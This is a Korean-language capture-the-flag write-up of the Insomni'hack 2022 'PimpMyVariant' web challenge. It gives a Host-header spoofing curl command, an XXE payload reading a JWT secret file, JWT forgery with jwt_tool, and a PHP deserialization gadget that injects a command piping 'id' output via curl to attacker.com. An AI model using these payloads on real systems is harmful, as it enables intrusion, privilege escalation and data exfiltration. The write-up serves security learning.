Insomni'hack 2022

< PimpMyVarient >

문제 창에 아무것도 없다. 익스플로잇 할 수 있는 요소가 없어 robots.txt부터 확인해봤다. 

해당 엔트리 포인트가 존재하는 것을 확인했지만

위와 같이 hostname이 허용되지 않는 것을 확인했다. 터미널 창을 열어 curl의 H옵션인 헤더를 추가하는 방식으로 "Host : 127.0.0.1"을 추가해보자.

curl 'https://pimpmyvariant.insomnihack.ch/readme' -H 'Host: 127.0.0.1'

스푸핑을 할 수 있다. 이 방식으로 스푸핑 가능한 페이지는 "/readme" 와 "/new"이다.

 

>> curl 'https://pimpmyvariant.insomnihack.ch/readme' -H 'Host: 127.0.0.1'

<html><head>
	<link rel="stylesheet" href="./dark-theme.css">
	<title>PimpMyVariant</title>
</head><body>
	<h1>Readme</h1>

#DEBUG- JWT secret key can now be found in the /www/jwt.secret.txt file

>> curl 'https://pimpmyvariant.insomnihack.ch/new' -H 'Host: 127.0.0.1'

<html><head>
	<link rel="stylesheet" href="./dark-theme.css">
	<title>PimpMyVariant</title>
</head><body>
	<h1>New variant</h1>


<form method="post" enctype="application/x-www-form-urlencoded" id="variant_form">
	Guess the next variant name : <input type="text" name="variant_name" id="variant_name" placeholder="inso-micron ?" /><br />
	<input type="submit" name="Bet on this" />
</form>
<script type="text/javascript">
document.getElementById('variant_form').onsubmit = function(){
	var variant_name=document.getElementById('variant_name').value;
	postData('/api', "<?xml version='1.0' encoding='utf-8'?><root><name>"+variant_name+"</name></root>")
		.then(data => {
			window.location.href='/';
		});
	return false;
}

async function postData(url = '', data = {}) {
	return await fetch(url, {
		method: 'POST',
		cache: 'no-cache',
		headers: {
			'Content-Type': 'text/xml'
		},
		redirect: 'manual',
		referrerPolicy: 'no-referrer',
		body: data
	});
}
</script>

</body></html>

"/new" endpoint에 스크립트를 확인할 수 있다. xml태그가 있는 것으로 보아 XXE 공격을 추측할 수 있다.

 

다음으로 "/readme"에서 "/www/jwt.secret.txt"를 가리키므로 XXE Injection을 통하여 해당 txt파일의 내용을 확인하자.

// XXE Injection to check out /www/jwt.secret.txt File

<?xml version='1.0' encoding='utf-8'?>
<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///www/jwt.secret.txt'>]>
<root>
    <name>&test;</name>
</root>

위 xml 문법을 txt 파일로 전송하고, 헤더의 응답을 확인하면 아래와 같다.

 

JWT와 함께 정상적인 Response Message를 확인 가능하다. jwt 복호화 툴인 jwt_tool을 이용해서 위 암호값을 확인해보자.

Token header values:
[+] alg = "HS256"
[+] typ = "JWT"

Token payload values:
[+] variants = ['Alpha', 'Beta', 'Gamma', 'Delta', 'Omicron', 'Lambda', 'Epsilon', 'Zeta', 'Eta', 'Theta', 'Iota', '54b163783c46881f1fe7ee05f90334aa']
[+] settings = "a:1:{i:0;O:4:"User":3:{s:4:"name";s:4:"Anon";s:7:"isAdmin";b:0;s:2:"id";s:40:"01750b2f9ac4ddbb2181db625b4be2988c59535c";}}"
[+] exp = 1643646120    ==> TIMESTAMP = 2022-01-31 08:22:00 (UTC)

XXE Injection을 통해 Success 문구를 확인했는데, Variants 리스트의 Iota 옆에 들어간 것을 확인할 수 있다. 또 위에서 눈에 띄는게 isAdmin이 0으로 되어 있다. 따라서 1로 바꿔보자.

$ python3 jwt_tool -b 'python3 jwt_tool.py -b 'eyJh ... V8' \
 -p 54b163783c46881f1fe7ee05f90334aa -S hs256 \
 -I -pc settings \
 -pv 'a:1:{i:0;O:4:"User":3:{s:4:"name";s:4:"Anon";s:7:"isAdmin";b:1;s:2:"id";s:40:"01750b2f9ac4ddbb2181db625b4be2988c59535c";}}'

eyJhsnp ... RnQZrNv8

$ curl 'https://pimpmyvariant.insomnihack.ch/log' \
    -H 'Host: 127.0.0.1' \
    -H 'Cookie: jwt=eyJhsnp ... RnQZrNv8'
    
[2022-1-31 02:12:01] Fatal error: Uncaught Error: Bad system command call from UpdateLogViewer::read() from global scope in /www/log.php:36
Stack trace:
#0 {main}
  thrown in /www/log.php on line 37
#0 {UpdateLogViewer::read}
  thrown in /www/UpdateLogViewer.inc on line 26

isAdmin = 1인 jwt를 보내봤더니 에러가 나왔지만 "/www/log.php"와 "/www/UpdateLogViewer.inc"를 확인할 수 있다. 아마 /www가 root directory인 것 같다. 

 

똑같은 방식으로 UpdateLogViewer.inc 파일을 살펴보겠다.

<?php
class UpdateLogViewer
{
    public string $packgeName;
    public string $logCmdReader;
    private static ?UpdateLogViewer $singleton = null;
    
    // This method won't get called on unserialization, we can override any
    // of our instance's attributes, even add new ones
    //
    // Also note that we need to make it public in order to call it manually when
    // building our payload
    private function __construct(string $packgeName)
    {
        $this->packgeName = $packgeName;
        $this->logCmdReader = 'cat';
    }
    
    // This method gets called in /www/log.php, hopefully after our settings
    // get unserialized
    public static function instance() : UpdateLogViewer
    {
        if( !isset(self::$singleton) || self::$singleton === null ){
            $c = __CLASS__;
            self::$singleton = new $c("$c");
        }
        return self::$singleton;
    }
    
    // Because file reading functions do not exist in PHP
    public static function read():string
    {
        return system(self::logFile());
    }
    
    // Data does not come directly from the $_GET array, so it's fully safe not to
    // filter or escape anything
    public static function logFile():string
    {
        return self::instance()->logCmdReader.' /var/log/UpdateLogViewer_'.self::instance()->packgeName.'.log';
    }
    
    // This replaces the current $singleton instance by $this instance
    public function __wakeup()// serialize
    {
        self::$singleton = $this; 
    }
};

위 코드는 JWT 변조를 통해 "settings"값을 조정하여 RCE를 터트릴 수 있는 코드이다. 이를 통해 User 인스턴스, UpdateLogViewer 인스턴스를 조작 가능하다.

 

한편 PHP __wakeup() method Vulnerability도 존재한다.

https://www.fatalerrors.org/a/php-deserialization-vulnerability.html

 

"setting" 배열이 unserialized되지 않으면, 클래스가 __wakeup() 메서드를 이용해 인스턴스화 된다. ( __construct() 메서드는 unserialize 중에 실행되지 않는다. )

 

공격자 입장에서 "$singleton"을 공략해야 한다.

<?php
// Code seems safe (for us), so we don't bother and include it
include 'UpdateLogViewer.inc';

// We inject our command in a subshell, piping its result to a remote HTTP server
$instance = new UpdateLogViewer('UpdateLogViewer$(id|curl attacker.com --data-binary @-)');

// Print original serialized data + an extra attribute containing our UpdateLogViewer
// instance, and our payload !
echo 'a:1:{i:0;O:4:"User":4:{s:4:"name";s:4:"Anon";s:7:"isAdmin";b:1;s:2:"id";s:40:"ff9d2c6e893ca3b4886f26eb98c2bc06754def72";s:2:"me";' . serialize($instance) . ';}}';

위와 같이 php를 저장하고

$ ./gen.php
a:1:{i:0;O:4:"User":4:{s:4:"name";s:4:"Anon";s:7:"isAdmin";b:1;s:2:"id";s:40:"ff9d2c6e893ca3b4886f26eb98c2bc06754def72";s:2:"me";O:15:"UpdateLogViewer":2:{s:10:"packgeName";s:55:"UpdateLogViewer$(id|curl attacker.com --data-binary @-)";s:12:"logCmdReader";s:3:"cat";};}}

$ curl 'https://pimpmyvariant.insomnihack.ch/log' \
    -H 'Host: 127.0.0.1' \
    -H "Cookie: jwt=$( \
        jwt_tool -b 'eyJhbGciOiJIUzI1N...J9cjKrLRfXl3P6OhHtI8' \
            -p 54b163783c46881f1fe7ee05f90334aa -S hs256 \
            -I -pc settings -pv "$(./gen.php)" \
        )"

위와 같이 curl을 이용해 전송시키면 쉘을 딴 것을 확인할 수 있다. 다음으로 "/www/flag.txt"를 확인하면 Flag 획득.

 

 

 

---

"/www/log"와 "/www/UpdateLogViewer.inc" 파일 확인하는 단계까지 갔는데, 그 이후에 어떤 방식으로 익스플로잇을 할 지 몰라서 결국 플래그를 얻지 못했다.

 

XXE Injection과 PHP Unserialized Vulnerability 공부를 디테일하게 해봐야할 것 같다.